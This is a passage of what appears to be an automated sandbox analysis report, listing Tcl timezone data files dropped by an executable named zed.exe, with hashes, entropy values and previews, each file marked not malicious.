                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHuwKXI3SMXGm2OHwdvoHvZUeQTnoo3v/vnqMVVMUMy:SlSWB9eg/X/43SDm2OHwdvoHvZZQTnoQ
                                                                                                                                                                                                                                            MD5:2CFB7C2A3D26D7AF0F6AE32ADD81C364
                                                                                                                                                                                                                                            SHA1:80C96E50D23A9A9531E4EE33744CF445C054B901
                                                                                                                                                                                                                                            SHA-256:124C137B091D9D54D5E0579131485428FAAE040ACC978D20D6A8C8E4DE9889AA
                                                                                                                                                                                                                                            SHA-512:A215FF5A69BD3E786BD3F8C952C8593396402EFA85005F5342093028617A6862EAE8BFD7B6D5737F90D90897AB62CF785544A4157A222AE4D0F70797FFBEC2CB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Port_Moresby) {.. {-9223372036854775808 35320 0 LMT}.. {-2840176120 35312 0 PMMT}.. {-2366790512 36000 0 +10}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):969
                                                                                                                                                                                                                                            Entropy (8bit):3.943959457262612
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86VrjmdHI5Cvn9HCFkN00hjNFq++UE+q0hwA+A7VxVnDEFn:IeZv8w0MNFq+xE+uAtx1c
                                                                                                                                                                                                                                            MD5:64AD3A103F4D145C48484BF8FACF41C2
                                                                                                                                                                                                                                            SHA1:40C00CFA56C87E506C254A93A164D7227DFF3BD5
                                                                                                                                                                                                                                            SHA-256:5AB006A686E564E30C94884FF8A9D728AEC74681DA8772E9722B6FE203630B5D
                                                                                                                                                                                                                                            SHA-512:D1088C3B673B5456A8706B69BE4D7AB18615EE53A82BF4ABE76E86700837E6BAD0BD79C13EDA9B04776B08A95B835BA755AA565F86E45BFE507E8783896C1EE2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Rarotonga) {.. {-9223372036854775808 48056 0 LMT}.. {-2209555256 -38344 0 LMT}.. {-543072056 -37800 0 -1030}.. {279714600 -34200 0 -10}.. {289387800 -36000 0 -10}.. {309952800 -34200 1 -10}.. {320837400 -36000 0 -10}.. {341402400 -34200 1 -10}.. {352287000 -36000 0 -10}.. {372852000 -34200 1 -10}.. {384341400 -36000 0 -10}.. {404906400 -34200 1 -10}.. {415791000 -36000 0 -10}.. {436356000 -34200 1 -10}.. {447240600 -36000 0 -10}.. {467805600 -34200 1 -10}.. {478690200 -36000 0 -10}.. {499255200 -34200 1 -10}.. {510139800 -36000 0 -10}.. {530704800 -34200 1 -10}.. {541589400 -36000 0 -10}.. {562154400 -34200 1 -10}.. {573643800 -36000 0 -10}.. {594208800 -34200 1 -10}.. {605093400 -36000 0 -10}.. {625658400 -34200 1 -10}.. {636543000 -36000 0 -10}.. {657108000 -34200 1 -10}.. {667992600 -36000 0 -10}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.854594370903023
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG5RFeyXHAIgObT5RV5RL/nUDHtluKpUDH5Rgn:SlSWB9vsM3ycdeSHAIgOb7N/vKbn
                                                                                                                                                                                                                                            MD5:EFC985F07B24BEDA22993C9D0EA7E022
                                                                                                                                                                                                                                            SHA1:6D05D12925621F1D05999A5DCC81B8C6F4D18945
                                                                                                                                                                                                                                            SHA-256:4F6A1C20A11E186012466091CD4B3C09D89D35E7560F93874DEC2D7F99365589
                                                                                                                                                                                                                                            SHA-512:5FB4D8784D2EB8AEF660D6CBC7C403561EE5874BEC0439762F3688C64830B52B1F557B467CA65B64B1210E82F385E134BF676F3CA443FB480702A2C90B3C3757
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Guam)]} {.. LoadTimeZoneFile Pacific/Guam..}..set TZData(:Pacific/Saipan) $TZData(:Pacific/Guam)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):193
                                                                                                                                                                                                                                            Entropy (8bit):4.78073436515702
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGurKeTnXHAIgObTurKefVHRL/nUDHthA5nUDHurK:SlSWB9vsM3yciemHAIgObiecN/NXevn
                                                                                                                                                                                                                                            MD5:8E335F5D0A2082BB673E7FEB56167A89
                                                                                                                                                                                                                                            SHA1:EF37235922D4477AC9B3D9576888CDE41E700741
                                                                                                                                                                                                                                            SHA-256:98D06302EFC18FAD7751F7E5A059FE4ABAFBC361FDC365FE1EB576209D92C658
                                                                                                                                                                                                                                            SHA-512:2572D99EE8BAF264B8A2EF3D7647D33A387EE83E036F9E7BDB21F64C2FCB43317AF9C899C8CDD822A2A5A207EF17504E71B217370473ED95AE925BBA2CFA90F9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pago_Pago)]} {.. LoadTimeZoneFile Pacific/Pago_Pago..}..set TZData(:Pacific/Samoa) $TZData(:Pacific/Pago_Pago)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):154
                                                                                                                                                                                                                                            Entropy (8bit):4.946903999617555
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHqhFPMXGm2OHl/oeoHsdNqRU7vV:SlSWB9eg/TTPDm2OHloeoH4qRW9
                                                                                                                                                                                                                                            MD5:341B0F535043051A91A21297BFA39DC0
                                                                                                                                                                                                                                            SHA1:6AD9177FC237503E6D36DE5408790A68D5D36E2C
                                                                                                                                                                                                                                            SHA-256:440A87DDB4F304DCBEAED1B0DE8F6058840E597918B688E0782F584DA03B1BBC
                                                                                                                                                                                                                                            SHA-512:D97D399A0F1B4347F8AE5F15E43A8787697339AB0EFB4E1106C790528FFC529ADC5B44B231D95449D39DB464D84A5DDF7B61E7D190E3E2B0091D1EC204B530A2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Tahiti) {.. {-9223372036854775808 -35896 0 LMT}.. {-1806674504 -36000 0 -10}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):152
                                                                                                                                                                                                                                            Entropy (8bit):4.969953728206455
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHqQ3fMXGm2OHyyFpoeoHvmciRrWFN0UIoAov:SlSWB9eg/T+Dm2OHyyFGeoHvmbu0YAov
                                                                                                                                                                                                                                            MD5:AA67FBBB6A02F5B30486C54E3A5C11D7
                                                                                                                                                                                                                                            SHA1:C64FD3654A47A0ECDD681B8A4D9B621AC6D97DBE
                                                                                                                                                                                                                                            SHA-256:91AA5DA8D5D1E72B1F561D0AEAB4B07E02EDD4EB95AE8C9F1C503C820460599F
                                                                                                                                                                                                                                            SHA-512:FC170904098011C091622A263CA554CEE952D64888D3573EB324E0A262E1A0C0885C059429F0FFF9219FEB8F1B6B97EC34661DD8DD547124D0C6C0A1C8EE24B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Tarawa) {.. {-9223372036854775808 41524 0 LMT}.. {-2177494324 43200 0 +12}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):451
                                                                                                                                                                                                                                            Entropy (8bit):4.343299747430587
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86PmdHmCdC/V7XZXw8Ut2rbUtGiAUtb4bUtqVy:iemn/VbKeOSy
                                                                                                                                                                                                                                            MD5:87CFDA2399A8126117E5BFC018B06518
                                                                                                                                                                                                                                            SHA1:6291611BCFB34293F9C20BA77170A13C1502C2ED
                                                                                                                                                                                                                                            SHA-256:ECC9D2E7AD7B5E5D6599CF442941595C99C4D69E802A4DDB4DA321898CDDE91D
                                                                                                                                                                                                                                            SHA-512:846FE07FEB82EC5F87FAE137D23074934246DBB7C7EE30F44F6C5373183B5FD2211B58E5CF1AB9A47938D282CA322FBDE80B58054FE6517CDC549992439F19A8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Tongatapu) {.. {-9223372036854775808 44352 0 LMT}.. {-767189952 44400 0 +1220}.. {-284041200 46800 0 +13}.. {915102000 46800 0 +13}.. {939214800 50400 1 +13}.. {953384400 46800 0 +13}.. {973342800 50400 1 +13}.. {980596800 46800 0 +13}.. {1004792400 50400 1 +13}.. {1012046400 46800 0 +13}.. {1478350800 50400 1 +13}.. {1484398800 46800 0 +13}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.903352083734246
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yci/452HAIgObi/4oA6N/TAOA/4pv:MByMdNXiU5trv
                                                                                                                                                                                                                                            MD5:443F5FFA58C5DB1F02695C5B76DF4F5E
                                                                                                                                                                                                                                            SHA1:115AFE9C3EB36F836E2DF95AF42C43EA5C21C1E6
                                                                                                                                                                                                                                            SHA-256:323A858946A2E8EC67C28176977D646C0A0F6DC8B48F9C4A3F8E7112C9B1B71D
                                                                                                                                                                                                                                            SHA-512:33717F3423CE06D827445FEA85BE8A989712CF8C06C54A17B9610A4DAD50BF64CAE80DE15AB12AB0610CD6B5582A897DD9C543098108543FA3E6273AAD9467DE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Port_Moresby)]} {.. LoadTimeZoneFile Pacific/Port_Moresby..}..set TZData(:Pacific/Truk) $TZData(:Pacific/Port_Moresby)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.771810884789573
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGqhyXHAIgObTq0vFvRL/nUDHpbhpUDHqNn:SlSWB9vsM3ycmhSHAIgObmSN/0h9Nn
                                                                                                                                                                                                                                            MD5:992D44D728747D79E1F7EF47E3CB2EF2
                                                                                                                                                                                                                                            SHA1:8F05E8DA2A2A45F04B9B89BB34F0B7833B56A261
                                                                                                                                                                                                                                            SHA-256:B6041BC18B595E38953632ACAD1D25F7394BF7C759A72FCCD81AF637F8016373
                                                                                                                                                                                                                                            SHA-512:C59D360941240C8B11D892A930B6CFE141B1A55007483683AF400B1A0C98EF0BBBE7EF595EF6BA73A6EECB8E3D0658A681CF3203E5E32DE80DD61EDB9C6CBDB0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Wake) $TZData(:Pacific/Tarawa)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.752883303864462
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGqhyXHAIgObTq0vFvRL/nUDHpEsppUDHqNn:SlSWB9vsM3ycmhSHAIgObmSN/t+9Nn
                                                                                                                                                                                                                                            MD5:862ADA129322E53235ED5099A72FE8EE
                                                                                                                                                                                                                                            SHA1:7DAB7BF451CF0FE483EA512C0C733B090FF22EFF
                                                                                                                                                                                                                                            SHA-256:9601B749413D591D820AFAD431B3C30E577ACAB000EA11EC03DEB36EF0738DC3
                                                                                                                                                                                                                                            SHA-512:D9C94BE2F08220E49A336A5760DBF43FCB889ADA95E29117AE5E237E33E9EE50BD32203D2743346A21354AF3F1ADDA43A2953FB55205B6FA998A6294CC57F063
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Wallis) $TZData(:Pacific/Tarawa)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):200
                                                                                                                                                                                                                                            Entropy (8bit):4.896778032757086
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yci/452HAIgObi/4oA6N/eP/4pv:MByMdNXiU5teev
                                                                                                                                                                                                                                            MD5:343CCAC12AEB0DD78FC60405DF938729
                                                                                                                                                                                                                                            SHA1:B7B4DF0178DEEC2BA6F23AF5CD896CF16CEAF224
                                                                                                                                                                                                                                            SHA-256:16CF9FAB116E5E1732B4B601DA919798985A0C15803F0964844C7040894C5DBA
                                                                                                                                                                                                                                            SHA-512:041609C63E95322460A31AC83BCC4F8F90B8D44B2740A5CF7E37F66CCD9F928416D74D313370516D7B1780DF2C9C9A78B7069CE2DA6BFFE88C46FB47CE1A4CB2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Port_Moresby)]} {.. LoadTimeZoneFile Pacific/Port_Moresby..}..set TZData(:Pacific/Yap) $TZData(:Pacific/Port_Moresby)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):174
                                                                                                                                                                                                                                            Entropy (8bit):4.940195299412468
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVqEGIV5XHAIgoqpEGYvWARL/nSi67x/yQa0EGIy:SlSWB9vsM3ymc4HAIgocVAN/27x6qF
                                                                                                                                                                                                                                            MD5:E6AA2F6A05B57AA9B4AEF8E98552EEB2
                                                                                                                                                                                                                                            SHA1:22470C204152702D8826CA52299E942F572C85ED
                                                                                                                                                                                                                                            SHA-256:C27E1179B55BF0C7DB6F1C334C0C20C4AFA4DBB84DB6F46244B118F7EAB9C76E
                                                                                                                                                                                                                                            SHA-512:B28A264907C32F848D356FB0F5776C2CE819DCB6BC08A5E2DCD4FA455EE1616966E816748079C7A55485BABFFB292D567E6F958168F945889E33A267B0E7EDA9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Warsaw)]} {.. LoadTimeZoneFile Europe/Warsaw..}..set TZData(:Poland) $TZData(:Europe/Warsaw)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.9353841548970205
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxMvLS3vXHAIgoqyMvLL6RL/nM24h8QavMvLBn:SlSWB9vsM3ymvMv2PHAIgovMvH6N/e8i
                                                                                                                                                                                                                                            MD5:7D7BD6E40D3ADCA04754255D69B5CC9D
                                                                                                                                                                                                                                            SHA1:EE32167B450DE7B0F1A15199795AEF9524BE623B
                                                                                                                                                                                                                                            SHA-256:EFD666F3062D52C5D0B4F83B1A206E6840C1EAEC356CD77A0A71C7EDFA78C964
                                                                                                                                                                                                                                            SHA-512:6056AAF078316A89079D19555F0BAEFB4C1CDBAA5426A8BEE76E0BFA5C69A5DAAFD199DEF978ABD67287AE1B80F754B7845EAFD5CC0995FE10E44D1F34D5435C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Lisbon)]} {.. LoadTimeZoneFile Europe/Lisbon..}..set TZData(:Portugal) $TZData(:Europe/Lisbon)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):165
                                                                                                                                                                                                                                            Entropy (8bit):4.795776391333205
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qMveyXHAIgNqBLFARL/lOr4WFKfMy:SlSWB9vsM3yKMveSHAIgcBJAN/S4wKfB
                                                                                                                                                                                                                                            MD5:C5AE3A1DAD32C870651C74E367F604CF
                                                                                                                                                                                                                                            SHA1:9FF81383C43D98441841E182BC783381EF565204
                                                                                                                                                                                                                                            SHA-256:9AEC39777013B23D63D0509EBB2F01D57A2C1592264DBB19CE2C61C7D7DDD8DE
                                                                                                                                                                                                                                            SHA-512:3A7217ED885011972262B71DB7F5D7E4C9C6E82B4BEEF0718BCB9452E49FDBDD5ED78564156577AB09150140B862E1944B4B739BCE0C50E63667050C35329503
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Taipei)]} {.. LoadTimeZoneFile Asia/Taipei..}..set TZData(:ROC) $TZData(:Asia/Taipei)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                                                                            Entropy (8bit):4.900717350092823
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8ZQckovXHAIgNtvQMHRL/lmFeWFKKQ7:SlSWB9vsM3yJJHAIgbHN/pwKv
                                                                                                                                                                                                                                            MD5:59E4C80F97FAFC92987B08BFA03B5EE5
                                                                                                                                                                                                                                            SHA1:4F86FCE17A51C3789DEB887BE01A1A0E6EA3D2DE
                                                                                                                                                                                                                                            SHA-256:63153B40225270ADB7CD248788CA9F18C6DEBAF222B3165BBAB633337592DF44
                                                                                                                                                                                                                                            SHA-512:9FCC0F747096775D0FB8DD252A73E6F47C16BF2D7DB0C3FBDFD206EE57393276FB40F65C1441296AE2AC115CFEE11098474DF3FEF8EE1FABE139427A8991F052
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Seoul)]} {.. LoadTimeZoneFile Asia/Seoul..}..set TZData(:ROK) $TZData(:Asia/Seoul)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.85623787837429
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq801c3vXHAIgNtK1tyHRL/kZ8O5h4WFKf1z:SlSWB9vsM3yUgHAIgWv6N/kth4wKf9
                                                                                                                                                                                                                                            MD5:5EABBAAF3B29B5DFF9E54136F7ABC654
                                                                                                                                                                                                                                            SHA1:44615F03264012D97512F9AB386413DD72BE1090
                                                                                                                                                                                                                                            SHA-256:B9443FB17F0128DDB9F2DF657DC5D2DF176F64C61B0D02B272E5DFB108537678
                                                                                                                                                                                                                                            SHA-512:B930D637A1E69E0847ADDEAB013B2C25BC27EBB9CDF20B9CDDFDAC111E9F26BB5EBC83194E845ACC3E1B9A08C386C94FCC4FDE32292EB558E3F7463832BB38B9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Singapore)]} {.. LoadTimeZoneFile Asia/Singapore..}..set TZData(:Singapore) $TZData(:Asia/Singapore)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.996391010176349
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSNJB9vsM3y7p5oeSHAIgppON/kjx+90ppv:JByMYbpwt8+90b
                                                                                                                                                                                                                                            MD5:1AC81E2C60D528A6C5BF2E6867146813
                                                                                                                                                                                                                                            SHA1:73D2D24FE6D56CA34ABF11B9A95DC22F809C5158
                                                                                                                                                                                                                                            SHA-256:978C4E5256057CE7374AD7929605090FC749B55558495BD0112FB0BB743FA9C2
                                                                                                                                                                                                                                            SHA-512:DB2673FB54C1308BBEB298A186F9130FB9090CE33B958C82D62B9BD88EE39BAB9A1BE40645547BA4167FD475892A323CF8EBA16C97F6FDF5693F1BF7A313FE9A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:SystemV/AST4) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.9470542553730255
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx02NEO/vXHAIg202NEqA6RL/kRDwh4IAcGE2NEOyn:SlSNJB9vsM3y7UEOXHAIgpUEqA6N/k+H
                                                                                                                                                                                                                                            MD5:2AB4B896957F26B114A990F69989F3FB
                                                                                                                                                                                                                                            SHA1:8048C99F5EE02C021F311709B30EB28D650D884D
                                                                                                                                                                                                                                            SHA-256:0114C111F5BCD838A28F2E16E01ECB79D8AFC8CBF639A672889ED0D692FC6CDC
                                                                                                                                                                                                                                            SHA-512:353744359CD94B1E8184A8B83F762459C69D3AEEA43DA638C1F4CC34E01E9D86C2EBCF7F7BFD059CB23B64051510D1C4556A49D180F8A92DE8449139194DCDC9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Halifax)]} {.. LoadTimeZoneFile America/Halifax..}..set TZData(:SystemV/AST4ADT) $TZData(:America/Halifax)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.957831162100758
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx0sAzE5Y5XHAIg20sAzEo5RL/kR/eIAcGEsAzEpv:SlSNJB9vsM3y7hzi2HAIgphznN/kc90q
                                                                                                                                                                                                                                            MD5:3EC0B09EAB848821D48849673B24401C
                                                                                                                                                                                                                                            SHA1:41599CBA78E124A7DA9744D2B4EA8CDC10008E0B
                                                                                                                                                                                                                                            SHA-256:30428B85B37898AD98B65BE5B6A8BD599331D9A1B49605FC6521464228E32F8F
                                                                                                                                                                                                                                            SHA-512:9A3303B3338C01B281A40BB48B93C446ADB92BBDC45371667F09EDA92F9EE2AEC60CE8E98CE15C0112B823799C76AEF14895B15DC997DA506494D75BBE58D662
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Regina)]} {.. LoadTimeZoneFile America/Regina..}..set TZData(:SystemV/CST6) $TZData(:America/Regina)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.975428048518589
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx096yXHAIg20961yHRL/kRwx/h4IAcGE967:SlSNJB9vsM3y796SHAIgp9616N/kyxpQ
                                                                                                                                                                                                                                            MD5:D85CCC5EFAA1ED549D02F09A38A53C68
                                                                                                                                                                                                                                            SHA1:642ED571E4C6F60A953D42DA4F756F2262E4E709
                                                                                                                                                                                                                                            SHA-256:44BEF7D4660A9A873EB762E3FDC651D31D97893545DE643FA1B2D05991C090A1
                                                                                                                                                                                                                                            SHA-512:3CC6A14A17EA4833958A7D444073D6C2709FD61BF54387E5C362151E9143F795B2432B621080DD53E0FC9BDD7C58F406E046E3D0A2BBA4132D99E7C705E6D645
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Chicago)]} {.. LoadTimeZoneFile America/Chicago..}..set TZData(:SystemV/CST6CDT) $TZData(:America/Chicago)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.928128138328689
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSNJB9vsM3y73G7JHAIgp3GZRN/kkp4903G8:JByMY3G7Kp3GntVp4903G8
                                                                                                                                                                                                                                            MD5:506D15E2F37F501F5A592154142A5296
                                                                                                                                                                                                                                            SHA1:5ACA12E0BA0FFF9734ED978A9C60AAA9D1E05A59
                                                                                                                                                                                                                                            SHA-256:798F92E5DDA65818C887750016D19E6EE9445ADFE0FCB7ACB11281293A09C2C7
                                                                                                                                                                                                                                            SHA-512:2EE08D39461CAD3492BE88B421BA463B4CEB8497F036518794BCF605F477057FEA218A9DFBB6335A28A5120750EA06AED9D2EA84CD0007D34CDE562DCD79CC0C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indianapolis)]} {.. LoadTimeZoneFile America/Indianapolis..}..set TZData(:SystemV/EST5) $TZData(:America/Indianapolis)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):195
